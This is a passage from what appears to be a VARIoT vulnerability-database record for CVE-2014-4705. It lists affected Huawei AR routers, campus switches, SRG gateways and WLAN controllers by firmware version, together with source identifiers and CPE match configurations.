            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc100",
         },
         {
            model: "ar160",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc100",
         },
         {
            model: "ar530",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc200",
         },
         {
            model: "ar2200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc100",
         },
         {
            model: "srg2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc200",
         },
         {
            model: "ar150",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc100",
         },
         {
            model: "ar3200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc900",
         },
         {
            model: "ar3200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc200",
         },
         {
            model: "ar3200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc300",
         },
         {
            model: "ar1200",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar150",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar160",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar200",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar2200",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar3200",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar530",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s5300",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "firmware",
         },
         {
            model: "campus s5700",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "firmware",
         },
         {
            model: "campus s6300",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "firmware",
         },
         {
            model: "campus s6700",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "firmware",
         },
         {
            model: "campus s7700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s9300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s9700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "netengine16ex",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "srg1300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "srg2300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "srg3300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "wlan ac 6005",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "wlan ac 6605",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "firmware",
         },
         {
            model: "wlan acu2",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s7700 v200r002c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s7700 v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s9300 v200r001c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s9300 v200r002c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s9300 v200r003c00spc500",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s7700 v200r003c00spc500",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s9700 v200r001c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s9700 v200r002c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s9700 v200r003c00spc500",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s5300 v200r001c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s5300 v200r002c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s5300 v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s5700 v200r001c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s5700 v200r002c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s5700 v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s6300 v200r001c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s6300 v200r002c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s6300 v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s6700 v200r001c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s6700 v200r002c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "campus s6700 v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "wlan v200r003c00spc100",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "6605",
         },
         {
            model: "wlan v200r003c00spc200",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "6605",
         },
         {
            model: "wlan v200r003c00spc300",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "6605",
         },
         {
            model: "wlan v200r003c00spc500",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "6605",
         },
         {
            model: "wlan v200r005c00spc100",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "6605",
         },
         {
            model: "wlan ac6005 v200r003c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "wlan ac6005 v200r003c00spc200",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "wlan ac6005 v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "wlan ac6005 v200r003c00spc500",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "wlan ac6005 v200r005c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "wlan acu2 v200r005c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2018-03422",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2014-008513",
         },
         {
            db: "NVD",
            id: "CVE-2014-4705",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201801-1088",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r001c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r002c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar150_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar150_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar150_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar150_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar150_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar150_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar150_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:ar150:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar160_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar160_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar160_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar160_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar160_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar160_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar160_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:ar160:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar200_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar200_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar200_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar200_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar200_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar200_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar200_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:ar200:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar1200_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar1200_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar1200_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar1200_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar1200_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar1200_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar1200_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:ar1200:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar2200_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar2200_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar2200_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar2200_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar2200_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar2200_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar2200_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:ar2200:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar3200_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar3200_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar3200_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar3200_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar3200_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar3200_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar3200_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:ar3200:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar530_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar530_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar530_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar530_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar530_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar530_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar530_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:ar530:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:netengine16ex_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:netengine16ex_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:netengine16ex_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:netengine16ex_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:netengine16ex_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:netengine16ex_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:netengine16ex_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:netengine16ex:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg1300_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg1300_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg1300_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg1300_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg1300_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg1300_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg1300_firmware:v200r005c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:srg1300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg2300_firmware:v200r003c00spc200:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg2300_firmware:v200r005c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg2300_firmware:v200r003c01spc900:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg2300_firmware:v200r003c01spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg2300_firmware:v200r003c01spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:srg2300_firmware:v200r003c00spc100:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
